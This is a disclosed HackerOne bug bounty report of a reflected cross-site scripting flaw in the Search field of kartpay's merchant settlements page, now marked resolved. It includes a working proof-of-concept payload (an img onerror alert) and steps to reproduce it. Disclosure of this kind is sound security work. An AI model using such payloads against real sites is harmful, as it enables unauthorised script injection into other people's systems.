XSS in https://merchant.kartpay.com/settlements

Disclosed: 2019-08-28 15:27:35 By c00lbugs To kartpay
Unknown
Vulnerability Details
**Parameter** ``Search`` **Payload** ``"><img src=x onerror=alert(domain)>`` **URL** ``https://merchant.kartpay.com/settlements`` **Steps to reproduce** 1. Go to URL: https://merchant.kartpay.com/settlements 2. Enter above payload. 3. You will see xss payload getting executed. {F535235} {F535234} {F535236} ## Impact Cross-site scripting is a flaw that allows users to inject HTML or JavaScript code into a page enabling arbitrary input. There are two main variants of XSS, stored and reflected.
Actions
View on HackerOne
Report Stats
  • Report ID: 653221
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report